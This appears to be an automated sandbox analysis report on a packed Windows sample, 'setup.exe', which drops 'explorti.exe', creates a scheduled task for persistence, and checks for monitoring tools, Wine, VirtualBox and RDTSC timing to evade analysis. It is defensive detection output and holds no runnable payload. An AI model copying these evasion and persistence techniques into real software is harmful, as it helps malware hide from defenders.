Source: C:\Users\user\Desktop\setup.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: setup.exe

Static file information: File size 1971200 > 1048576

Source: setup.exe

Static PE information: Raw size of rylhmesc is bigger than: 0x100000 < 0x1afc00

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\setup.exe	Unpacked PE file: 0.2.setup.exe.c20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rylhmesc:EW;ofvhckac:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rylhmesc:EW;ofvhckac:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 2.2.explorti.exe.2b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rylhmesc:EW;ofvhckac:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rylhmesc:EW;ofvhckac:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 3.2.explorti.exe.2b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rylhmesc:EW;ofvhckac:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rylhmesc:EW;ofvhckac:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 10.2.explorti.exe.2b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rylhmesc:EW;ofvhckac:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rylhmesc:EW;ofvhckac:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: explorti.exe.0.dr	Static PE information: real checksum: 0x1edd2b should be: 0x1ed18b
Source: setup.exe	Static PE information: real checksum: 0x1edd2b should be: 0x1ed18b

Source: setup.exe	Static PE information: section name:
Source: setup.exe	Static PE information: section name: .idata
Source: setup.exe	Static PE information: section name:
Source: setup.exe	Static PE information: section name: rylhmesc
Source: setup.exe	Static PE information: section name: ofvhckac
Source: setup.exe	Static PE information: section name: .taggant
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: .idata
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: rylhmesc
Source: explorti.exe.0.dr	Static PE information: section name: ofvhckac
Source: explorti.exe.0.dr	Static PE information: section name: .taggant

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 10_2_002CD84C push ecx; ret

10_2_002CD85F

Source: setup.exe	Static PE information: section name: entropy: 7.983148121720557
Source: setup.exe	Static PE information: section name: rylhmesc entropy: 7.952696111098041
Source: explorti.exe.0.dr	Static PE information: section name: entropy: 7.983148121720557
Source: explorti.exe.0.dr	Static PE information: section name: rylhmesc entropy: 7.952696111098041

Source: C:\Users\user\Desktop\setup.exe

File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\setup.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

File created: C:\Windows\Tasks\explorti.job

Jump to behavior

Source: C:\Users\user\Desktop\setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\setup.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: C8EFBC second address: C8E7EC instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF32CDD6566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c pushad 0x0000000d cld 0x0000000e mov dword ptr [ebp+122D1CC1h], edi 0x00000014 popad 0x00000015 push dword ptr [ebp+122D0B15h] 0x0000001b mov dword ptr [ebp+122D1C24h], ebx 0x00000021 call dword ptr [ebp+122D26DAh] 0x00000027 pushad 0x00000028 sub dword ptr [ebp+122D1B97h], ecx 0x0000002e xor eax, eax 0x00000030 mov dword ptr [ebp+122D1B97h], eax 0x00000036 mov edx, dword ptr [esp+28h] 0x0000003a jmp 00007FF32CDD6578h 0x0000003f mov dword ptr [ebp+122D34ECh], eax 0x00000045 mov dword ptr [ebp+122D1B97h], eax 0x0000004b mov esi, 0000003Ch 0x00000050 jp 00007FF32CDD6567h 0x00000056 add esi, dword ptr [esp+24h] 0x0000005a jmp 00007FF32CDD6579h 0x0000005f lodsw 0x00000061 clc 0x00000062 add eax, dword ptr [esp+24h] 0x00000066 clc 0x00000067 mov ebx, dword ptr [esp+24h] 0x0000006b pushad 0x0000006c mov dword ptr [ebp+122D1B97h], ecx 0x00000072 sub eax, dword ptr [ebp+122D3414h] 0x00000078 popad 0x00000079 nop 0x0000007a pushad 0x0000007b jbe 00007FF32CDD656Ch 0x00000081 jp 00007FF32CDD6566h 0x00000087 push edi 0x00000088 push eax 0x00000089 push edx 0x0000008a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: C8E7EC second address: C8E7FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007FF32CFB71F6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: DE9D49 second address: DE9D6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FF32CDD6575h 0x0000000a jl 00007FF32CDD6566h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E05EAE second address: E05EB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E05EB2 second address: E05F02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CDD6576h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FF32CDD6578h 0x00000011 jmp 00007FF32CDD6579h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E05F02 second address: E05F07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E05F07 second address: E05F0C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E06060 second address: E0609F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FF32CFB71FFh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jo 00007FF32CFB71F6h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 jnc 00007FF32CFB71F6h 0x0000001f popad 0x00000020 jmp 00007FF32CFB7205h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E061D3 second address: E061E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 jne 00007FF32CDD6566h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E08DBA second address: E08E34 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF32CFB71F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FF32CFB7201h 0x0000000f popad 0x00000010 add dword ptr [esp], 0C9E1D41h 0x00000017 jc 00007FF32CFB71F9h 0x0000001d push 00000003h 0x0000001f push 00000000h 0x00000021 push ebp 0x00000022 call 00007FF32CFB71F8h 0x00000027 pop ebp 0x00000028 mov dword ptr [esp+04h], ebp 0x0000002c add dword ptr [esp+04h], 0000001Bh 0x00000034 inc ebp 0x00000035 push ebp 0x00000036 ret 0x00000037 pop ebp 0x00000038 ret 0x00000039 movzx edx, si 0x0000003c push 00000000h 0x0000003e mov esi, edx 0x00000040 mov cx, E9AAh 0x00000044 push 00000003h 0x00000046 mov edi, dword ptr [ebp+122D26E0h] 0x0000004c push 6C589B65h 0x00000051 pushad 0x00000052 jnc 00007FF32CFB71FCh 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E08E34 second address: E08E38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E08E38 second address: E08E7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7202h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a add dword ptr [esp], 53A7649Bh 0x00000011 jmp 00007FF32CFB7202h 0x00000016 lea ebx, dword ptr [ebp+1244DC23h] 0x0000001c mov dword ptr [ebp+122D26E7h], edx 0x00000022 push eax 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E08E7A second address: E08E7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E08E7E second address: E08E82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E08EE9 second address: E08F15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 sub dword ptr [ebp+122D19B0h], eax 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 xor dword ptr [ebp+122D2EE4h], esi 0x00000018 pop edx 0x00000019 push 47E2DAD0h 0x0000001e push eax 0x0000001f push edx 0x00000020 js 00007FF32CDD656Ch 0x00000026 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E08F15 second address: E08F8D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 47E2DA50h 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007FF32CFB71F8h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 jmp 00007FF32CFB7208h 0x0000002e push 00000003h 0x00000030 stc 0x00000031 push 00000000h 0x00000033 call 00007FF32CFB71FAh 0x00000038 and esi, dword ptr [ebp+122D362Ch] 0x0000003e pop edx 0x0000003f push 00000003h 0x00000041 and edx, dword ptr [ebp+122D1B16h] 0x00000047 push A898F41Fh 0x0000004c push ecx 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007FF32CFB71FAh 0x00000054 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E0904C second address: E090D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6576h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov dword ptr [esp], eax 0x0000000d or dword ptr [ebp+122D1960h], edx 0x00000013 push 00000000h 0x00000015 mov di, cx 0x00000018 push 4FE6D845h 0x0000001d jmp 00007FF32CDD656Bh 0x00000022 xor dword ptr [esp], 4FE6D8C5h 0x00000029 mov dl, 99h 0x0000002b push 00000003h 0x0000002d push ecx 0x0000002e mov dword ptr [ebp+122D1C03h], eax 0x00000034 pop esi 0x00000035 push 00000000h 0x00000037 sbb cx, BB00h 0x0000003c push 00000003h 0x0000003e push 00000000h 0x00000040 push edi 0x00000041 call 00007FF32CDD6568h 0x00000046 pop edi 0x00000047 mov dword ptr [esp+04h], edi 0x0000004b add dword ptr [esp+04h], 0000001Ch 0x00000053 inc edi 0x00000054 push edi 0x00000055 ret 0x00000056 pop edi 0x00000057 ret 0x00000058 mov si, 882Dh 0x0000005c push D27FA0DCh 0x00000061 pushad 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E090D2 second address: E090D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2A523 second address: E2A527 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2A69F second address: E2A6A9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2A7EB second address: E2A800 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FF32CDD6566h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007FF32CDD6566h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2A800 second address: E2A804 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2A804 second address: E2A811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2A811 second address: E2A819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2A819 second address: E2A835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF32CDD6575h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2A835 second address: E2A842 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF32CFB71F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2AAEC second address: E2AAF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2ADFF second address: E2AE03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2AF88 second address: E2AF92 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF32CDD6566h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2B108 second address: E2B119 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jg 00007FF32CFB71F6h 0x00000009 pop esi 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2B253 second address: E2B259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2B259 second address: E2B262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2B262 second address: E2B268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2B268 second address: E2B270 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2B270 second address: E2B27C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2B27C second address: E2B280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2B280 second address: E2B292 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD656Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2B3EE second address: E2B3F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2B3F9 second address: E2B41F instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF32CDD6566h 0x00000008 jmp 00007FF32CDD656Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop eax 0x00000010 js 00007FF32CDD6572h 0x00000016 jl 00007FF32CDD656Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2B5AC second address: E2B5B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2B5B2 second address: E2B5B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E1FA6C second address: E1FA70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2BC67 second address: E2BC6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2BC6B second address: E2BC85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FF32CFB71FEh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2BC85 second address: E2BC98 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c ja 00007FF32CDD6566h 0x00000012 pop ebx 0x00000013 rdtsc
